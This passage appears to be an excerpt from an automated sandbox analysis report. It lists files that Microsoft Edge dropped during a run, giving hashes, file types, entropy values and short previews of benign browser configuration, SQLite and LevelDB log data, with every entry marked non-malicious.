                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.555790634850688
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                                                                                                                                  MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                                                                                                                                  SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                                                                                                                                  SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                                                                                                                                  SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.238439841588133
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7VNvvYfYebvqBZFUtfD/5F5JfYebvqBaJ:7VdYfYebvygflXJfYebvL
                                                                                                                                                                                                                                                                                  MD5:1B121D7D4EC8536076CCE2EB4E255D77
                                                                                                                                                                                                                                                                                  SHA1:8183291A665D9B975F426D3A0BEA2D5AAF4B1BA9
                                                                                                                                                                                                                                                                                  SHA-256:1A2DDA20B9EF1149BA7AD19744465D86889D2D2D1D9B2E0C10FCCD35BFE09973
                                                                                                                                                                                                                                                                                  SHA-512:019BF1CB9A757517453FB2E07E4D9E78A30B12628B761870D22D5161591EFA672C35C106CC72D34B3688010057AB9E938AAD23170A8E1EAA519CE6D2474A3276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:32:53.188 c20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/03-17:32:53.190 c20 Recovering log #3.2025/01/03-17:32:53.194 c20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.238439841588133
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7VNvvYfYebvqBZFUtfD/5F5JfYebvqBaJ:7VdYfYebvygflXJfYebvL
                                                                                                                                                                                                                                                                                  MD5:1B121D7D4EC8536076CCE2EB4E255D77
                                                                                                                                                                                                                                                                                  SHA1:8183291A665D9B975F426D3A0BEA2D5AAF4B1BA9
                                                                                                                                                                                                                                                                                  SHA-256:1A2DDA20B9EF1149BA7AD19744465D86889D2D2D1D9B2E0C10FCCD35BFE09973
                                                                                                                                                                                                                                                                                  SHA-512:019BF1CB9A757517453FB2E07E4D9E78A30B12628B761870D22D5161591EFA672C35C106CC72D34B3688010057AB9E938AAD23170A8E1EAA519CE6D2474A3276
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:32:53.188 c20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/03-17:32:53.190 c20 Recovering log #3.2025/01/03-17:32:53.194 c20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.169774619609214
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCm1M+q2Pwkn23oH+TcwtpIFUtfCm3Zmw5CmKMVkwOwkn23oH+Tcwta/WLJ:7V/M+vYfYebmFUtfx/5kMV5JfYebaUJ
                                                                                                                                                                                                                                                                                  MD5:CAF78D94DABC08DFF89B90BDE4BE345B
                                                                                                                                                                                                                                                                                  SHA1:770A7057F8CD905861FD0AD748A8E721A4E18F9D
                                                                                                                                                                                                                                                                                  SHA-256:A3022133BC908757CFB24F09CEB83F5FC936722ED8B1CB4237DFFFC86BC155D9
                                                                                                                                                                                                                                                                                  SHA-512:5E3A81F56F63695DA0E0EA74441CEE56053AF8D81A53E58C26FB91A4C106A78E386D47D44D8E5B14D8D2BDCC820728ABC20486CB43C7E3E3B28D7B127B8846F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.929 1a6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/03-17:33:00.931 1a6c Recovering log #3.2025/01/03-17:33:00.931 1a6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.169774619609214
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCm1M+q2Pwkn23oH+TcwtpIFUtfCm3Zmw5CmKMVkwOwkn23oH+Tcwta/WLJ:7V/M+vYfYebmFUtfx/5kMV5JfYebaUJ
                                                                                                                                                                                                                                                                                  MD5:CAF78D94DABC08DFF89B90BDE4BE345B
                                                                                                                                                                                                                                                                                  SHA1:770A7057F8CD905861FD0AD748A8E721A4E18F9D
                                                                                                                                                                                                                                                                                  SHA-256:A3022133BC908757CFB24F09CEB83F5FC936722ED8B1CB4237DFFFC86BC155D9
                                                                                                                                                                                                                                                                                  SHA-512:5E3A81F56F63695DA0E0EA74441CEE56053AF8D81A53E58C26FB91A4C106A78E386D47D44D8E5B14D8D2BDCC820728ABC20486CB43C7E3E3B28D7B127B8846F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.929 1a6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/03-17:33:00.931 1a6c Recovering log #3.2025/01/03-17:33:00.931 1a6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.169774619609214
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCm1M+q2Pwkn23oH+TcwtpIFUtfCm3Zmw5CmKMVkwOwkn23oH+Tcwta/WLJ:7V/M+vYfYebmFUtfx/5kMV5JfYebaUJ
                                                                                                                                                                                                                                                                                  MD5:CAF78D94DABC08DFF89B90BDE4BE345B
                                                                                                                                                                                                                                                                                  SHA1:770A7057F8CD905861FD0AD748A8E721A4E18F9D
                                                                                                                                                                                                                                                                                  SHA-256:A3022133BC908757CFB24F09CEB83F5FC936722ED8B1CB4237DFFFC86BC155D9
                                                                                                                                                                                                                                                                                  SHA-512:5E3A81F56F63695DA0E0EA74441CEE56053AF8D81A53E58C26FB91A4C106A78E386D47D44D8E5B14D8D2BDCC820728ABC20486CB43C7E3E3B28D7B127B8846F5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.929 1a6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/03-17:33:00.931 1a6c Recovering log #3.2025/01/03-17:33:00.931 1a6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.26707851465859517
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                                                                                                                                  MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                                                                                                                                  SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                                                                                                                                  SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                                                                                                                                  SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 6, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):184320
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0670948310278259
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:gSqzWMMUfTKnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYbvn6:grzWMffenzkkqtXnTK+hNH+5EVumo
                                                                                                                                                                                                                                                                                  MD5:339342F4A3CEF32326C2A9DD5AB637F5
                                                                                                                                                                                                                                                                                  SHA1:696E6A1E453FC35658409E7A544EFCF9D97C858A
                                                                                                                                                                                                                                                                                  SHA-256:29AD3AB8A0A08D3F04F5B0403717CE1B59678B6DC5146467B9DF3DE94A0E52AA
                                                                                                                                                                                                                                                                                  SHA-512:99C7D6D4157B6F7729BAF4EA95AE944396802A3DA2490FBECB64E2F05F01DA5CA5756051C68F174A0B9E164D89F159001795A58A383313E72826B62337E8589F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7836182415564406
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                                                                                                                                                  MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                                                                                                                                                  SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                                                                                                                                                  SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                                                                                                                                                  SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46578371800356894
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBBRLKQek:v7doKsKuKZKlZNmu46yjxTvek
                                                                                                                                                                                                                                                                                  MD5:A8C58AFF961BF700522E8F8533650311
                                                                                                                                                                                                                                                                                  SHA1:32586BD0A5D58F10BB9C27B3C9B08484FBC1E8EA
                                                                                                                                                                                                                                                                                  SHA-256:9E32C4B3C06ED62EAE57F144C2810A481374A74C5FCFF1BFD8AD592DFB56DFF0
                                                                                                                                                                                                                                                                                  SHA-512:0F13C74C367366913085DFA3E4F83F0E96CA9321954A08577580858DEBE314C3EC3B7B1ABE747B9DB3E22CD500AE03F660379D8350EE8FE7130FB614F8DAEEA4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.13427121683374965
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:rd9Nllv/etXleu2eo1qvTv4RRfs21d7jdtQfQvi8T9sXtXleu26:Wleu2dpRS+dndM8Taleu26
                                                                                                                                                                                                                                                                                  MD5:6DB1BE60E8DBF803DF5994708336B3F4
                                                                                                                                                                                                                                                                                  SHA1:CC1128167CFCC54C18F56420B6B20D2D65C7982E
                                                                                                                                                                                                                                                                                  SHA-256:7B64B3981280E8BB334CB97D051FB00070BE2FF7AE9D448979F094BD4824D282
                                                                                                                                                                                                                                                                                  SHA-512:23B6724A2865D09D599D633C12D9FE5EAF0B20FFF72C407B723847B50B25630C093B5CFE7C052DFA3E75D8BFE2E622BEAE9AF16108D44C61D18A165AD5B1CFAE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............Ot..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17374), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):17375
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.409572458732797
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JZCm4keYhYojREy6VrhU4bIj8/pj+FnYQwpvUj1f:sV6LAJu43J4mBday65lpUYQw1k
                                                                                                                                                                                                                                                                                  MD5:F43D64458E243C103944A2678C9D7D63
                                                                                                                                                                                                                                                                                  SHA1:D815F6486FBD35251F3B0AF138F208BE4D7357EC
                                                                                                                                                                                                                                                                                  SHA-256:C5B114CAE3402339CD719E1E999F0FB0B03961B63E1A11BC24547AE31B2FF27A
